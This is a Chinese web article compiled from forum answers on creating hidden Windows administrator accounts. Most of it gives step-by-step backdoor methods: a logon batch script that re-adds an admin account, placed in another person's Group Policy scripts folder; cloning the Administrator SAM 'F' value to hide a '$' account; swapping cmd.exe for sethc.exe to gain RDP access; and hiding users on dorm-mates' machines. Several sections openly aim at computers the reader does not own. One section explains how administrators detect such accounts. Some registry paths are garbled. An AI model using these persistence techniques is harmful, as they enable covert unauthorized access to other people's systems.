当前位置:首页 > 服务器 > 正文

服务器建立隐藏账户(服务器建立隐藏账户的方法)

今天给各位分享服务器建立隐藏账户的知识,其中也会对服务器建立隐藏账户的方法进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!

本文目录一览:

请问如何创建服务器超级隐藏账户

为了服务器安全?我倒

首先添加一个账户 添加到管理组 ,然后 从注册表导出,之后删除用户,用注册表导入,基本就这个

另外记得用户的开头是$

这样在命令行模式下看不到....

不过重启之后能看到 并不能达到真正的隐藏,需要用开机自启动配合使用. ..

我有机会经常玩别人电脑,怎么在他的电脑当中留下后门

一.建立一个别人永远删不掉的管理员用户操作步骤:

1、在自己电脑里面建立一个.txt文本文件.

2、在里面输入内容

@echo off

net user yixiao 123456 /add 注释:前面yixiao是用户名后面123456是密码;

net localgroup administrators yixiao /add

3、把这个文件保存,更改后缀为yixiao.bat 注释:前面名字随便,后面格式一定要是bat;

4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\scripts\Logon文件目录下,没有的话自己创建。

完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!

如果把里面的内容改成

@echo off

net user administrator 123456 /add

意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。

二.俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好 。

操作步骤:

1、首先建立一个帐号结尾要带$号 ,如果yixiao$ , 密码自己随便,然后把帐号删除.

2、将以下代码保存成(.reg)注册表形式

代码如下:

——————————————————————————-

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\

names\yixiao$]

@=hex(1f4):

——————————————————————————-

说明:1f4是Administrator帐号十六进制的值

3、保存好后导入 ,然后用CMD命令设置密码

net user yixiao$ 123456

这样一个隐形帐号就建立好了,用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦,如果被查出来。。。。。嘿嘿:-)

隐藏管理员帐号三分钟搞定

对 regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下,但是除了系统用户SYSTEM外,其它用户 都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体 步聚如下:

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将 administrator加入,并设置权限为“完全控制”。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将 会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输 入”regedit.exe” 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names [url=]\\hacker$[/url]”

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、 1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键”F”的值复制,并覆盖hacker$对应的项 00000409下的键”F”的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

那我们管理员又该如何把“隐藏账户”请出系统

隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统。

1、添加“$”符号型隐藏账户

对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入 “net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏 的。

2、修改注册表型隐藏账户

由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到 注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这 里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。

3、无法看到名称的隐藏账户

如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建 立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入 “gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件” 和“审核过程追踪”进行相同的设置。

进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中 的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账 户就暴露无疑了。

得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。

win2003下创建永远的隐藏帐户操作一、二

前段时间比较流行的一句话”肉机”其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家。

其实每一个用户帐号在注册表中都有自己帐号数据项

首先我们看看管理员在注册表中的数据项是什么样的

操作一、打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM

SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表不是很熟悉的朋友不要随便改动注册表)

操作二、认识注册表中的帐号分类

在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。

”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。

“000001fa5” 表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。有关常见的命令,这些命令也可以在OS的帮助中找到。

操作三、利用”net user”命令创建帐号

一、先建立隐藏用户 xbx$ 1、net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc

1、C:\Documents and Settings\Administratornet localgroup administrators xbx$ /add 这里的意思是说把xbx,以便让我们创建用户具备管理员权限。

一、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

1、找到我们刚刚创建的用户帐号

我们可以看见”000003f6”就是我们刚新建立的”xbx

2、在注册表中多帐号权限复制

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 这个项,打开”000001f4”项,然后再打开”F”。

然后将这里面的值,全选,粘帖并覆盖到”000003f6”的”F”值.

3、导出注册表值

现在将注册表中的“000001f4”、“000003f6”和“xbx”都导入出来,可直接将Users所有键值都导出来,到文件.

4、删除帐号

接下来我们再次进入“CMD”中删除“xbx

删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中。 这个时候我们打开“本地计算机用户和组”就看不见“xbx”

先把system32下的sethc.exe删除掉,然后 把cmd.exe改名为sethc.exe就OK了,利用的是5次连续敲击shift的热键功能,下次你3389登陆服务器的时候,就可以利用热键功能打开cmd,从而增加账号,就可以登录服务器了

能不能在linux下创建隐藏的超级用户

用root用户名登入 它是linux的超级用户。刚装的linux都是root用户名登入 如果你不想用root登入必须建一个用户,看有很多东西不能搞 root其实就是管理员用的用户,你要配置服务器必须要用root用户登入才能配置

怎样在服务器里建立隐藏用户?

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

这是注册表里修改帐户隐藏属性的地方。

建立在Windows XP欢迎屏幕中隐藏的用户

在学校的宿舍里,很多人的机器里都设置了Windows XP的登录密码,并在开机后显示欢迎屏幕。如果我们趁他们不在的时候偷偷添加一个用户,以后就会在WindowsXP的欢迎屏幕中显示出来。这曾使我们在机主不在的时使用他机器的梦想变成了泡影,而如果通过组策略设置,把登陆界面改成Windows 2000的经典登陆界面又常常会引发别人的怀疑。那究竟有没有一个简单的方法能够,实现在WindowXP中建立一个在欢迎屏幕和控制面板的用户选项中都不显示的隐藏用户呢?呵呵,看看下面的文章吧,也许会对你有所启发。

首先选中我的电脑,单击鼠标右键,选择管理。在打开的计算机管理窗口中,展开本地用户和组。在选中用户子项后,我们会在右边的窗口中看到已经建立的用户。这时我们在右边窗口的空白处,单击鼠标右键,并选择新用户。如下图1所示:

图1

之后我们可以编辑一个名为Backup Operator的用户,并可以作适当的编辑。如下图2所示:

图2

小提示:注意最后要取消默认的用户下次登陆时需更改密码选项,并选中用户不能更改密码和密码永不过期选项。

之后我们单击创建,关闭。这时我们会发现多出了一个Backup Operator的用户。现在我们双击这个用户,在弹出的窗口中选择隶属于选项卡,单击添加,将弹出选择组的对话框。如下图3所示:

图3

现在我们选择高级,在新的对话框中选择立即查找,并选中Backup operators单击确定,下一步是在选择组对话框中,单击确定。如下图4所示:

图4

还必须要强调的一点是:我们必须在Backup Operator用户的隶属于选项卡中,将隶属于下的User组删掉,如下图5所示:

图5

打开控制面板里的用户选项之后,我们会发现这里并没有刚才我们所建的帐户,如图6所示。

图6

现在重新启动你的计算机,会在Windows XP的欢迎屏幕下发现同样没有我们的用户名。那怎么办呢?我们可以同时按下CRTl-Alt-Del键,这时看见了什么?这不是Windows 2000的经典登录的对话框吗?哈哈,现在我们输入用户名后便可以享受那个蓝天白云的世界了!

本文在Windows XP Professional Edition+ SP2下测试成功,由于Windows XP Home Edition 不支持用户与组功能,所以不能使用此方法。

如何给服务器创造一个隐藏的用户?

假定cmd下建立的隐藏帐户为piao$成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。

将“piao$”的键值导出为piao$.reg,同时将“000003E9”和“000001F4”项的F键值分别导出为user.reg,admin.reg。用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内容,完成后保存。接下来进入“命令提示符”,输入“net

user

piao$

/del”将我们建立的隐藏账户删除。最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成。

服务器建立隐藏账户的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于服务器建立隐藏账户的方法、服务器建立隐藏账户的信息别忘了在本站进行查找喔。

取消
扫码支持 支付码